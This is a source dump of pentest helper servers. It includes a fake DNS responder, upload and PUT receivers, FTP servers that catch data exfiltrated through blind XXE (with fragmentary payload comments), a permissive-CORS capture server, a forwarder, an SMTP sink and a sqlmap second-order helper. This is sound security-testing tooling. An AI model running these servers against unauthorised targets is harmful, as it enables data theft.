to as parameter 1' 40 | sys.exit(1) 41 | 42 | 43 | print 'pyminifakeDNS:: dom.query. 60 IN A %s' % ip 44 | udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 45 | udps.bind(('',53)) 46 | 47 | try: 48 | while 1: 49 | data, addr = udps.recvfrom(1024) 50 | p=DNSQuery(data) 51 | udps.sendto(p.request(ip), addr) 52 | print 'Request: %s -> %s from %s' % (p.dominio, ip, addr) 53 | except KeyboardInterrupt: 54 | print 'Finalise' 55 | udps.close() 56 | -------------------------------------------------------------------------------- /helper_servers/flask_upload.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, render_template, request, redirect, url_for 2 | from werkzeug.utils import secure_filename 3 | import datetime 4 | import os 5 | 6 | def timestamp(): 7 | return datetime.datetime.now().strftime('%Y%m%d%H%M%S') 8 | 9 | app = Flask(__name__) 10 | app.config['UPLOAD_FOLDER'] = '/uploads' 11 | 12 | 13 | @app.route('/', methods=['GET']) 14 | def index(): 15 | return ''' 16 | 17 | Hi 18 | Hi 19 | ''' 20 | 21 | #curl -F file=@"/tmp/test.txt" https://[site]/[app_path]/ul 22 | @app.route('/ul', methods=['GET', 'POST']) 23 | def upload_file(): 24 | if request.method == 'POST': 25 | if 'file' not in request.files: 26 | return redirect(request.url) 27 | file = request.files['file'] 28 | if file.filename == '': 29 | return redirect(request.url) 30 | if file: 31 | filename = '{}_{}.data'.format(timestamp(), secure_filename(file.filename)) 32 | file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) 33 | return redirect(url_for('upload_file')) 34 | return ''' 35 | 36 | Upload 37 |
38 |     <form method=post enctype=multipart/form-data>
39 |       <input type=file name=file>
40 |       <input type=submit value=Upload></form>
41 | ''' 42 | 43 | 44 | if __name__ == '__main__': 45 | app.run(host='0.0.0.0', port=8000) 46 | -------------------------------------------------------------------------------- /helper_servers/ftp-xxe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import time, socket 4 | from optparse import OptionParser 5 | from SocketServer import BaseRequestHandler, ThreadingTCPServer 6 | from sys import stdout 7 | 8 | class FTPHandler(BaseRequestHandler): 9 | """Handler for FTP sessions.""" 10 | 11 | def debug(self, message): 12 | """Show log message.""" 13 | if self.server.debug: 14 | print '***', message 15 | 16 | def respond(self, code, explanation): 17 | """Send a response to the client.""" 18 | self.request.send('%d %s\r\n' % (code, explanation)) 19 | 20 | def process_request(self): 21 | """Parse input into a command and an argument.""" 22 | data = self.recvall() 23 | parts = data.strip().split(' ',1) 24 | return parts.pop(0), parts, data.strip() 25 | 26 | def log_auth(self, user, password): 27 | """Write data to logfile.""" 28 | 29 | line = ' '.join((now, client, user, password)) 30 | self.server.logfile.write(line + '\n') 31 | self.server.logfile.flush() 32 | 33 | def save_to_file(self, data): 34 | client = '%s:%d' % self.client_address 35 | filename = client + '-' + str(int(time.time())) 36 | with open(filename, 'w') as f: 37 | f.write(data) 38 | 39 | def recvall(self, timeout=''): 40 | #setup to use non-blocking sockets 41 | #if no data arrives it assumes transaction is done 42 | #recv() returns a string 43 | self.request.setblocking(0) 44 | total_data=[] 45 | data='' 46 | begin=time.time() 47 | if not timeout: 48 | timeout=1 49 | while 1: 50 | #if you got some data, then break after wait sec 51 | if total_data and time.time()-begin>timeout: 52 | break 53 | #if you got no data at all, wait a little longer 54 | elif time.time()-begin>timeout*2: 55 | break 56 | wait=0 57 | try: 58 | data=self.request.recv(64) 59 | if data: 60 | total_data.append(data) 61 | begin=time.time() 62 | data='';wait=0 63 | else: 64 | time.sleep(0.001) 65 | except: 66 | pass 67 | #When a recv returns 0 bytes, other side has closed 68 | result=''.join(total_data) 69 | return result 70 | 71 | def handle(self): 72 | """Handle incoming data.""" 73 | self.debug('Connection from %s:%d.' 
% self.client_address) 74 | self.respond(220, 'Welcome') 75 | self.recvdata = '' 76 | 77 | while True: 78 | cmd, args, data = self.process_request() 79 | arg = (args and args[0] or '') 80 | if cmd == 'USER': 81 | self.debug(data.strip()) 82 | self.respond(331, 'Please specify the password.') 83 | # signals an attempt to change to passive mode, but by this time we probably already have our data and want to terminate 84 | elif cmd == 'EPSV': 85 | self.debug(data.strip()) 86 | self.respond(522, 'Not supported') 87 | self.debug('R: 522, Not supported') 88 | elif cmd == 'CWD': 89 | #self.debug(data.strip()) 90 | if self.server.verbose or self.debug: 91 | stdout.write('/' + arg) 92 | self.recvdata += '/' + arg 93 | self.respond(230, 'Proceed') 94 | elif cmd == 'RETR': 95 | self.debug(data.strip()) 96 | if self.server.verbose or self.debug: 97 | stdout.write('/' + arg) 98 | self.recvdata += '/' + arg 99 | self.respond(530, 'Go away') 100 | break 101 | else: 102 | self.debug(data.strip()) 103 | self.respond(230, 'Proceed') 104 | self.debug('R: 230, Proceed') 105 | 106 | self.request.close() 107 | if self.server.verbose or self.debug: 108 | print "\n" 109 | if self.server.save_to_file: 110 | self.save_to_file(self.recvdata[1:]) #remove leading added / 111 | self.debug('Connection with %s:%d closed.' % self.client_address) 112 | 113 | 114 | class FTPServer(ThreadingTCPServer): 115 | 116 | def __init__(self, host='', port=21, debug=False, save_to_file=False, 117 | verbose=True): 118 | ThreadingTCPServer.__init__(self, (host, port), FTPHandler) 119 | self.debug = debug 120 | self.verbose = verbose 121 | self.save_to_file = save_to_file 122 | 123 | def server_close(self): 124 | ThreadingTCPServer.server_close(self) 125 | 126 | 127 | 128 | if __name__ == '__main__': 129 | parser = OptionParser(usage='%prog [options] ') 130 | parser.add_option('-d', '--debug', dest='debug', action='store_true', 131 | help='show debugging messages') 132 | parser.add_option('-s', '--save', dest='save_to_file', action='store_true', 133 | help='write collected data to generated logfiles') 134 | opts, args = parser.parse_args() 135 | 136 | # Parse arguments. 137 | if len(args) != 1: 138 | parser.print_help() 139 | parser.exit() 140 | try: 141 | port = int(args[0]) 142 | except ValueError: 143 | parser.print_help() 144 | parser.exit() 145 | 146 | # Serve. 147 | server = FTPServer(port=port, **opts.__dict__) 148 | try: 149 | server.serve_forever() 150 | except KeyboardInterrupt: 151 | print 'Ctrl-C pressed, exiting...' 
152 | server.server_close() 153 | 154 | -------------------------------------------------------------------------------- /helper_servers/ftp-xxe3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import time 3 | from optparse import OptionParser 4 | from sys import stdout 5 | from socketserver import BaseRequestHandler, ThreadingTCPServer 6 | import asyncio 7 | import threading 8 | 9 | # ftp-xxe XXE data retrieval server updated for Python 3 and providing basic PASV support for clients that request it and die without it 10 | 11 | # Blind Example: 12 | # XXE injection 13 | # %xxe;]> 14 | 15 | # remote DTD 16 | # 17 | #"> 18 | #%eval; 19 | #%exfiltrate; 20 | 21 | 22 | 23 | # used for PASV server 24 | def tcpWorker(host, port): 25 | 26 | # this is unlikely to ever receive anything, it just needs to be ready to accept a TCP connection 27 | async def handle_client(reader, writer): 28 | data = await reader.read(100) 29 | message = data.decode() 30 | addr = writer.get_extra_info('peername') 31 | print(f"Received {message!r} from {addr!r}") 32 | writer.write(data) 33 | await writer.drain() 34 | writer.close() 35 | 36 | loop = asyncio.new_event_loop() 37 | asyncio.set_event_loop(loop) 38 | 39 | server = asyncio.start_server(handle_client, host, port) 40 | loop.run_until_complete(server) 41 | loop.run_forever() 42 | 43 | 44 | 45 | class FTPHandler(BaseRequestHandler): 46 | """Handler for FTP sessions.""" 47 | 48 | def debug(self, message): 49 | """Show log message.""" 50 | if self.server.debug: 51 | print('***', message) 52 | 53 | def respond(self, code, explanation): 54 | """Send a response to the client.""" 55 | self.request.send(b'%d %s\r\n' % (code, explanation)) 56 | 57 | def process_request(self): 58 | """Parse input into a command and an argument.""" 59 | 60 | data = self.recvall() 61 | parts = data.strip().split(b' ',1) 62 | return parts.pop(0), parts, data.strip() 63 | 64 | 65 | def save_to_file(self, data): 66 | client = '%s:%d' % self.client_address 67 | filename = client + '-' + str(int(time.time())) 68 | with open(filename, 'w') as f: 69 | f.write(data) 70 | 71 | def recvall(self, timeout=''): 72 | #setup to use non-blocking sockets 73 | #if no data arrives it assumes transaction is done 74 | #recv() returns bytes 75 | self.request.setblocking(0) 76 | total_data=[] 77 | data='' 78 | begin=time.time() 79 | if not timeout: 80 | timeout=1 81 | while 1: 82 | #if you got some data, then break after wait sec 83 | if total_data and time.time()-begin>timeout: 84 | break 85 | #if you got no data at all, wait a little longer 86 | elif time.time()-begin>timeout*2: 87 | break 88 | wait=0 89 | try: 90 | data=self.request.recv(64) 91 | if data: 92 | total_data.append(data) 93 | begin=time.time() 94 | data='';wait=0 95 | else: 96 | time.sleep(0.001) 97 | except: 98 | pass 99 | #When a recv returns 0 bytes, other side has closed 100 | result=b''.join(total_data) 101 | return result 102 | 103 | def handle(self): 104 | """Handle incoming data.""" 105 | self.debug('Connection from %s:%d.' 
% self.client_address)
106 |         self.respond(220, b'Welcome')
107 |         self.recvdata = ''
108 |
109 |         while True:
110 |             cmd, args, data = self.process_request()
111 |             arg = (args and args[0] or b'')
112 |             if cmd == b'USER':
113 |                 self.debug(data.strip())
114 |                 self.respond(331, b'Please specify the password.')
115 |                 #self.debug('')
116 |             elif cmd == b'PASS':
117 |                 self.debug(data.strip())
118 |                 self.respond(230, b'Login successful')
119 |             elif cmd == b'PWD':
120 |                 self.debug(data.strip())
121 |                 self.respond(257, b'"/" is the current directory.')
122 |             elif cmd == b'TYPE':
123 |                 self.debug(data.strip())
124 |                 self.respond(200, b'Type set to: Binary')
125 |             elif cmd == b'OPTS':
126 |                 self.debug(data.strip())
127 |                 self.respond(501, b'Invalid argument.')
128 |             elif cmd == b'PASV':
129 |
130 |                 # super hacky PASV standin - for some servers there just needs to be something to connect to for the RETR with file content to happen after PASV
131 |                 # saying not supported might be better?
132 |                 if not self.server.pasv_running:
133 |                     bgsk = threading.Thread(target=tcpWorker, args=(self.server.server_address[0], self.server.pasv_port), daemon=True).start()
134 |                     self.server.pasv_running = True
135 |
136 |                 self.debug(data.strip())
137 |                 # PASV port is number 5 * 256 + number 6(!)
138 |                 resp = 'Entering passive mode ({},{},{}).'.format(','.join(self.server.server_address[0].split('.')), self.server.pasv_port // 256, self.server.pasv_port % 256)
139 |                 self.respond(227, bytes(resp, 'utf8'))
140 |                 self.debug(resp)
141 |                 if self.server.server_address[0] == '0.0.0.0':
142 |                     self.debug('DEBUG: If things fail here try setting the i option to the IP address the client is connecting to')
143 |             elif cmd == b'EPSV':
144 |                 self.debug(data.strip())
145 |                 self.respond(522, b'Not supported')
146 |                 self.debug('R: 522, Not supported')
147 |             elif cmd == b'CWD':
148 |                 self.debug(data.strip())
149 |                 self.recvdata += '/' + arg.decode()
150 |                 self.respond(230, b'Proceed')
151 |             elif cmd == b'RETR':
152 |                 self.debug(data.strip())
153 |                 if self.server.verbose or self.server.debug:
154 |                     stdout.write('File content:\n\n')
155 |                     stdout.write(arg.decode())
156 |                 self.recvdata += arg.decode()
157 |                 self.respond(530, b'Go away')
158 |                 break
159 |             else:
160 |                 self.debug(data.strip())
161 |                 self.respond(230, b'Proceed')
162 |                 self.debug('R: 230, Proceed')
163 |
164 |         self.request.close()
165 |         if self.server.verbose or self.server.debug:
166 |             print("\n")
167 |         if self.server.save_to_file:
168 |             self.save_to_file(self.recvdata)
169 |         self.debug('Connection with %s:%d closed.'
% self.client_address) 170 | 171 | 172 | class FTPServer(ThreadingTCPServer): 173 | 174 | def __init__(self, host='', port=21, debug=False, save_to_file=False, verbose=True, pasv_port=63071): 175 | ThreadingTCPServer.__init__(self, (host, port), FTPHandler) 176 | self.debug = debug 177 | self.verbose = verbose 178 | self.save_to_file = save_to_file 179 | self.pasv_port = pasv_port 180 | self.pasv_running = False 181 | 182 | 183 | def server_close(self): 184 | ThreadingTCPServer.server_close(self) 185 | 186 | 187 | 188 | if __name__ == '__main__': 189 | parser = OptionParser(usage='%prog [options] ') 190 | parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages') 191 | parser.add_option('-s', '--save', dest='save_to_file', action='store_true', help='write collected data to generated logfiles') 192 | parser.add_option('-i', '--ip', dest='host', default='', help='local ip address to bind to, might be required if remote client requests PASV mode') 193 | parser.add_option('-p', '--pasv_port', dest='pasv_port', default=63071, type=int, help='Local server port to use for PASV, if required') 194 | opts, args = parser.parse_args() 195 | 196 | # Parse arguments. 197 | if len(args) != 1: 198 | parser.print_help() 199 | parser.exit() 200 | try: 201 | port = int(args[0]) 202 | except ValueError: 203 | parser.print_help() 204 | parser.exit() 205 | 206 | 207 | 208 | server = FTPServer(port=port, **opts.__dict__) 209 | try: 210 | server.serve_forever() 211 | except KeyboardInterrupt: 212 | print('Ctrl-C pressed, exiting...') 213 | server.server_close() 214 | -------------------------------------------------------------------------------- /helper_servers/http_capture_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | import os 5 | import argparse 6 | from http.server import SimpleHTTPRequestHandler 7 | import socketserver 8 | import logging 9 | import ssl 10 | 11 | 12 | class MyParser(argparse.ArgumentParser): 13 | def error(self, message): 14 | sys.stderr.write('error: %s\n' % message) 15 | self.print_help() 16 | sys.exit(2) 17 | 18 | 19 | class LoggingHTTPRequestHandler(SimpleHTTPRequestHandler): 20 | 21 | def __init__(self, *args, **kwargs): 22 | super().__init__(*args, **kwargs) 23 | 24 | def _set_response(self): 25 | self.send_response(200) 26 | self.send_header('Content-type', 'text/html') 27 | self.end_headers() 28 | 29 | def do_GET(self): 30 | logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers)) 31 | super().do_GET() 32 | 33 | def do_OPTIONS(self): 34 | logging.info("OPTIONS request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers)) 35 | super().do_GET() 36 | 37 | 38 | def do_POST(self): 39 | content_length = int(self.headers['Content-Length']) 40 | post_data = self.rfile.read(content_length) 41 | logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", 42 | str(self.path), str(self.headers), post_data.decode('utf-8')) 43 | 44 | self._set_response() 45 | self.wfile.write("POST request for {}".format(self.path).encode('utf-8')) 46 | 47 | def end_headers(self): 48 | if 'origin' in self.headers and (not getattr(self, 'disable_cors_headers', False)): 49 | a_headers = ['content-type', 'x-requested-with'] 50 | a_headers += [a.rstrip().lstrip() for a in self.headers.get('Access-Control-Request-Headers', '').split(',') if a] 51 | a_methods = ['POST', 'GET', 'OPTIONS', 'DELETE'] 52 | a_methods += 
[a.rstrip().lstrip() for a in self.headers.get('Access-Control-Request-Methods', '').split(',') if a] 53 | origin = self.headers.get('origin') 54 | response_headers = { 55 | 'Access-Control-Allow-Origin' : origin if origin != 'null' else '*', 56 | 'Access-Control-Allow-Methods': ', '.join(set([a for a in a_methods if a])), 57 | 'Access-Control-Allow-Headers' : ', '.join(set([a for a in a_headers if a])), 58 | 'Access-Control-Allow-Credentials': 'true' 59 | } 60 | for key in response_headers: 61 | self.send_header(key, response_headers[key]) 62 | super().end_headers() 63 | 64 | 65 | def create_custom_handler(directory: str, disable_cors: bool): 66 | 67 | class PathedLoggingHTTPRequestHandler(LoggingHTTPRequestHandler): 68 | def __init__(self, *args, **kwargs): 69 | self.disable_cors_headers = disable_cors 70 | super().__init__(*args, directory=directory, **kwargs) 71 | 72 | return PathedLoggingHTTPRequestHandler 73 | 74 | 75 | 76 | def run(port: int, address: str='', wrap_ssl: bool=False, ssl_keyfile: str=None, ssl_certfile: str=None, directory: str=None, disable_cors=False): 77 | logging.basicConfig(level=logging.INFO) 78 | server_address = (address, port) 79 | directory = directory if directory else os.getcwd() 80 | #httpd = HTTPServer(server_address, create_custom_handler(directory, disable_cors)) 81 | httpd = socketserver.ForkingTCPServer(server_address, create_custom_handler(directory, disable_cors)) 82 | 83 | if wrap_ssl: 84 | httpd.socket = ssl.wrap_socket (httpd.socket, 85 | keyfile=ssl_keyfile, 86 | certfile=ssl_certfile, server_side=True) 87 | 88 | logging.info('Starting httpd on port {}...\n'.format(str(port))) 89 | try: 90 | httpd.serve_forever() 91 | except KeyboardInterrupt: 92 | pass 93 | httpd.server_close() 94 | logging.info('Stopping httpd...\n') 95 | 96 | 97 | if __name__ == '__main__': 98 | 99 | parser = MyParser() 100 | parser.add_argument('-p', '--port', type=int, required=True, help='Port to serve on') 101 | parser.add_argument('-s', '--ssl', action='store_true', default=False, help='Enable ssl. If set you also need to provide a key and cert file . Default: disabled.') 102 | parser.add_argument('-k', '--key', type=str, default=None, help='SSL private key file in pem format') 103 | parser.add_argument('-c', '--cert', type=str, default=None, help='SSL certificate file in pem format') 104 | parser.add_argument('-a', '--address', type=str, default='', help='Address to bind the server to, defaults to all ') 105 | parser.add_argument('-d', '--directory', type=str, default=None, help='Directory to serve files from. 
pwd is used if not set.') 106 | parser.add_argument('-o', '--disable_cors', action='store_true', default=False, help='Disable the addition of permissive CORS headers in responses to requests with Origin header') 107 | args = parser.parse_args() 108 | 109 | if args.ssl: 110 | if not args.key and args.cert: 111 | print('If the ssl option is enabled you must also provide both a certificate (-c) and key (-k) file') 112 | parser.print_help() 113 | sys.exit(2) 114 | 115 | run(port=args.port, address=args.address, wrap_ssl=args.ssl, ssl_keyfile=args.key, ssl_certfile=args.cert, directory=args.directory, disable_cors=args.disable_cors) 116 | 117 | 118 | -------------------------------------------------------------------------------- /helper_servers/http_forwarder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import SimpleHTTPServer 3 | import SocketServer 4 | import sys 5 | import urllib 6 | import logging 7 | from optparse import OptionParser 8 | 9 | 10 | class ResultsProvider(object): 11 | '''Base class used to fetch data from server for forwarding''' 12 | 13 | import requests 14 | import socket 15 | import time 16 | 17 | def __init__(self, **kwargs): 18 | '''Constructor with sensible requests defaults''' 19 | self.session = self.requests.Session() 20 | self.wait = kwargs.get('wait', 2.0) 21 | self.session.verify = kwargs.get('verify', False) 22 | self.session.timeout = kwargs.get('timeout', 5) 23 | self.session.stream = kwargs.get('stream', False) 24 | self.session.proxies = kwargs.get('proxies', {}) 25 | self.session.headers = kwargs.get('headers', {}) 26 | self.session.allow_redirects = kwargs.get('allow_redirects', True) 27 | self.session.cookies = self.requests.utils.cookiejar_from_dict(kwargs.get('cookies', {})) 28 | self.url = kwargs.get('url', None) 29 | 30 | 31 | 32 | def doRequest(self, verb, url, **kwargs): 33 | '''Makes web request with timeoout support using requests session''' 34 | while 1: 35 | try: 36 | body = kwargs.pop('body') if kwargs.has_key('body') else None 37 | rargs = {} 38 | for a in ['data', 'json', 'params', 'headers']: 39 | if kwargs.has_key(a): 40 | rargs[a] = kwargs.pop(a) 41 | req = self.requests.Request(verb, url, **rargs) # data, headers, params, json 42 | prepped = req.prepare() 43 | if body: 44 | prepped.body = body 45 | response = self.session.send(prepped, **kwargs) # other params here 46 | break 47 | except (self.socket.error, self.requests.exceptions.RequestException): 48 | logging.exception('Retrying request in %.2f seconds...', self.wait) 49 | self.time.sleep(self.wait) 50 | continue 51 | return response 52 | 53 | 54 | 55 | 56 | def nextResult(self): 57 | '''Redefine me to make the request and return the response.text''' 58 | #return self.doRequest(url='http://site/whatever/' + str(calculated_value)).text 59 | raise NotImplementedError 60 | 61 | 62 | 63 | 64 | 65 | class ResultsProviderImpl(ResultsProvider): 66 | '''Implementation for forwarding arbitrary requests to another server''' 67 | 68 | def __init__(self, **kwargs): 69 | super(ResultsProviderImpl, self).__init__(**kwargs) 70 | self.hostname=kwargs.get('hostname') 71 | self.protocol=kwargs.get('protocol', 'http') 72 | self.port=kwargs.get('port') 73 | 74 | 75 | def nextResult(self, verb, path, **kwargs): 76 | r = self.doRequest(verb, '%s://%s:%s%s' %(self.protocol, self.hostname, self.port, path), **kwargs) 77 | return r 78 | 79 | 80 | 81 | 82 | class ThreadedTCPServer(SocketServer.ThreadingTCPServer): 83 | '''Simple Threaded TCP 
server''' 84 | pass 85 | 86 | 87 | class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): 88 | '''Simple http server request handler''' 89 | import datetime 90 | counter=0 91 | 92 | skip_headers = ['content-length', 'transfer-encoding', 'content-encoding', 'connection'] 93 | 94 | def print_debug(self, title, data): 95 | sep = '=' * 40 + '\n' 96 | dt = self.datetime.datetime.now() 97 | dts = dt.strftime('%d/%m/%Y %H:%M:%S') 98 | self.counter+=1 99 | print sep + title + ' - ' + str(self.counter) + ' - ' + dts + '\n' + sep + data + '\n' 100 | 101 | 102 | def send_response(self, code, message=None): 103 | '''Redefine from original to get rid of extra headers''' 104 | self.log_request(code) 105 | if message is None: 106 | if code in self.responses: 107 | message = self.responses[code][0] 108 | else: 109 | message = '' 110 | if self.request_version != 'HTTP/0.9': 111 | self.wfile.write("%s %d %s\r\n" % 112 | (self.protocol_version, code, message)) 113 | # print (self.protocol_version, code, message) 114 | #self.send_header('Server', self.version_string()) 115 | #self.send_header('Date', self.date_time_string()) 116 | 117 | 118 | 119 | def do(self, verb, data=None): 120 | args = {'headers' : self.headers.dict} 121 | if data: 122 | args['data'] = data 123 | response = self.server.resultsProvider.nextResult(verb, self.path, **args) 124 | if self.server.debug: 125 | self.print_debug('HTTP Request Received', self.raw_requestline + str(self.headers) + '\r\n' + (data if data else '')) 126 | 127 | self.send_response(response.status_code, response.reason) 128 | for header in response.headers.iteritems(): 129 | if header[0].lower() not in self.skip_headers: 130 | #self.print_debug('Header Sent', ' :'.join([header[0], header[1]])) 131 | self.send_header(header[0], header[1]) 132 | self.send_header('Content-Length', int(len(response.content))) 133 | self.send_header('Connection', 'close') 134 | self.wfile.write('\r\n') 135 | self.wfile.write(response.content) 136 | if self.server.debug: 137 | http_version = '.'.join([a for a in str(response.raw.version)]) 138 | version_line = 'HTTP/%s %s %s' %(http_version, response.status_code, response.reason) 139 | headers = '\r\n'.join([ '%s : %s' %(a[0],a[1]) for a in response.headers.items()]) 140 | self.print_debug('HTTP Response Received', '\r\n'.join([version_line, headers, '\r\n' + response.content])) 141 | #self.print_debug('Length of response', str(int(len(response.content)))) 142 | 143 | self.wfile.flush() 144 | self.wfile.close() 145 | 146 | 147 | def do_GET(self): 148 | self.do('GET') 149 | 150 | 151 | def do_HEAD(self): 152 | self.do('HEAD') 153 | 154 | 155 | def do_POST(self): 156 | data = self.rfile.read(int(self.headers['Content-Length'])) if \ 157 | self.headers.has_key('Content-Length') else '' 158 | self.do('POST', data=data) 159 | 160 | 161 | def match_url(input): 162 | return ((input.startswith('http://') or input.startswith('https://')) and \ 163 | input.endswith('/') and len(input.split('/')[2]) > 4 and len(input.split('/')) == 4) 164 | 165 | 166 | if __name__ == '__main__': 167 | parser = OptionParser(usage='%prog -u [url] [options]') 168 | parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages') 169 | parser.add_option('-u', '--url', dest='remoteurl', type='string', help='remote base url') 170 | parser.add_option('-p', '--port', dest='port', type='int', default=8000, help='local listen port') 171 | parser.add_option('-a', '--address', dest='address', type='string', default='0.0.0.0', 
help='local listen address') 172 | parser.add_option('-x', '--proxy', dest='proxy', type='string', help='optional proxy to use in format http://address:port/') 173 | opts, args = parser.parse_args() 174 | 175 | 176 | if opts.remoteurl == None: 177 | print 'Please provide a remote url using the -u --url option' 178 | sys.exit() 179 | elif not match_url(opts.remoteurl): 180 | print 'Please enter remote url in format protocol://host[:port]/' 181 | sys.exit() 182 | 183 | try: 184 | [protocol, _, host_port, _] = opts.remoteurl.split('/') 185 | protocol = protocol.rstrip(':') 186 | hostparts = host_port.split(':') 187 | hostname = hostparts[0] 188 | rport = int(hostparts[1]) if len(hostparts) > 1 else {'http' : 80, 'https' : 443}[protocol] 189 | except: 190 | print 'Please enter remote url in format protocol://host[:port]/' 191 | sys.exit() 192 | 193 | if opts.proxy: 194 | if not match_url(opts.proxy) and not opts.proxy.startswith('https'): 195 | print 'Please enter proxy in format http://host:port/' 196 | sys.exit() 197 | if opts.debug: 198 | print 'Using proxy ' + opts.proxy 199 | proxies = {protocol : opts.proxy} 200 | else: 201 | proxies = {} 202 | 203 | 204 | httpd = ThreadedTCPServer((opts.address, opts.port), ServerHandler) 205 | httpd.debug = opts.debug or False 206 | 207 | # add the custom resultsprovider implementation 208 | httpd.resultsProvider = ResultsProviderImpl(hostname=hostname, protocol=protocol, port=rport, proxies=proxies) 209 | 210 | 211 | print "Serving at: http://%s:%s/, forwarding requests to %s" % (opts.address, str(opts.port), opts.remoteurl) 212 | httpd.serve_forever() 213 | -------------------------------------------------------------------------------- /helper_servers/http_put_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from __future__ import print_function 3 | import sys 4 | import os 5 | import signal 6 | from threading import Thread 7 | if sys.version_info.major == 2: 8 | from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler 9 | else: 10 | from http.server import HTTPServer, BaseHTTPRequestHandler 11 | 12 | # to upload 13 | # curl -T 14 | 15 | class PUTHandler(BaseHTTPRequestHandler): 16 | def do_PUT(self): 17 | print("----- SOMETHING WAS PUT!! ------") 18 | print(self.headers) 19 | length = int(self.headers['Content-Length']) 20 | content = self.rfile.read(length) 21 | self.send_response(200) 22 | self.end_headers() 23 | open(os.getcwd() + self.path,'wb').write(content) 24 | 25 | def run_on(port): 26 | print("Starting a server on port %i" % port) 27 | server_address = ('0.0.0.0',port) 28 | httpd = HTTPServer(server_address, PUTHandler) 29 | httpd.serve_forever() 30 | 31 | if __name__ == "__main__": 32 | if len(sys.argv) < 2: 33 | print('Port number to listen on as parameter 1') 34 | sys.exit(1) 35 | ports = [int(arg) for arg in sys.argv[1:]] 36 | for port_number in ports: 37 | server = Thread(target=run_on, args=[port_number]) 38 | server.daemon = True # Do not make us wait for you to exit 39 | server.start() 40 | signal.pause() # Wait for interrupt signal, e.g. 
KeyboardInterrupt 41 | -------------------------------------------------------------------------------- /helper_servers/smtp_receiver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | '''SMTP server''' 3 | from __future__ import print_function 4 | from smtpd import SMTPServer 5 | from optparse import OptionParser 6 | import asyncore 7 | import os 8 | import sys 9 | import time 10 | import inspect 11 | 12 | 13 | # shut up about constants pylint! 14 | # pylint: disable-msg=C0103 15 | 16 | class CustomSMTPServer(SMTPServer): 17 | '''Custom SMTP receiver class that writes output to individual files on disk''' 18 | 19 | def __init__(self, localaddr, remoteaddr, outputdir, debug=False): 20 | '''Initialise''' 21 | self.outputdir = outputdir 22 | self.debug = debug 23 | if not (os.path.exists(outputdir) and os.path.isdir(outputdir)): 24 | raise ValueError('Provided output dir does not exist or is not a directory') 25 | SMTPServer.__init__(self, localaddr, remoteaddr) 26 | 27 | 28 | def get_messageid(self, data): 29 | '''Gets the sanitised message id from a message or a random hex string if missing''' 30 | allowed = '._-0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' 31 | m_ids = [a for a in data.split('\n') if a.startswith('Message-ID: ')] 32 | m_id = m_ids[0].split(': ', 1)[1] if m_ids else os.urandom(20).encode('hex') 33 | m_id = m_id.replace('@', '_at_') 34 | return ''.join([a for a in m_id if a in allowed]) 35 | 36 | 37 | def process_message(self, peer, mailfrom, rcpttos, data): 38 | '''Process received messages''' 39 | 40 | # hacky method of getting HELO header 41 | frame = inspect.currentframe().f_back 42 | try: 43 | # pylint: disable-msg=W0212 44 | helo = str(frame.f_locals['self']._SMTPChannel__greeting) + ' ' 45 | except AttributeError: 46 | helo = '' 47 | 48 | 49 | headers = [] 50 | headers.append('Received: from ' + helo + ':'.join([str(a) for a in peer])) 51 | headers.append('Rcpt date: ' + time.strftime('%c %Z')) 52 | headers.append('Rcpt from: ' + mailfrom) 53 | headers.append('Rcpt to: ' + ', '.join([a for a in rcpttos])) 54 | if self.debug: 55 | for header in headers: 56 | print(header) 57 | print(data) 58 | message_id = self.get_messageid(data) 59 | time_stamp = time.strftime('%Y%m%d%H%M%S') 60 | out = os.path.join(self.outputdir, time_stamp + '_' + message_id) 61 | open(out, 'w').write('\n'.join([a for a in headers]) + '\n' + data) 62 | return 63 | 64 | 65 | if __name__ == '__main__': 66 | parser = OptionParser(usage='%prog [options] host port output_directory') 67 | parser.add_option('-d', '--debug', dest='debug', default=False, 68 | action='store_true', help='show debugging messages') 69 | opts, args = parser.parse_args() 70 | 71 | try: 72 | host = args[0] 73 | port = int(args[1]) 74 | output = args[2] 75 | except (ValueError, NameError, IndexError): 76 | print(parser.format_help()) 77 | sys.exit(1) 78 | 79 | try: 80 | smtp_server = CustomSMTPServer((host, port), None, output, debug=opts.debug) 81 | except ValueError: 82 | print('Provided output_directory does not exist') 83 | sys.exit(1) 84 | 85 | asyncore.loop() 86 | -------------------------------------------------------------------------------- /helper_servers/sqlmap_secondorder_helper_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import SimpleHTTPServer 3 | import SocketServer 4 | import sys 5 | import urllib 6 | import logging 7 | from optparse import OptionParser 8 | 
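# A minimal custom provider sketch to complement the usage notes below (the class name
# and target URL here are illustrative assumptions, not part of the original tool):
#
#class FixedPageProvider(ResultsProvider):
#    def nextResult(self):
#        # re-fetch the page where the injected value surfaces and hand its HTML to sqlmap
#        return self.doRequest('http://target.example/comments/latest').text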
9 | 
10 | # Helper example middleware server to enable sqlmap to use its second-order exploitation option with changing urls
11 | # modify as needed for your purposes
12 | 
13 | # To Use:
14 | # Create your own implementation of the ResultsProvider class which returns the desired page with the nextResult method
15 | # An example of how this can be done for a URL with incrementing value is shown in ResultsProviderImpl
16 | 
17 | # create an instance of the ThreadedTCPServer, and pass the resultsProvider and any desired parameters in like so
18 | #httpd = ThreadedTCPServer(("", port), ServerHandler)
19 | #httpd.resultsProvider = ResultsProviderImpl(url='http://server/base/path', counter=23)
20 | #httpd.serve_forever()
21 | 
22 | # Then run sqlmap with the second order option pointing to this server, e.g.
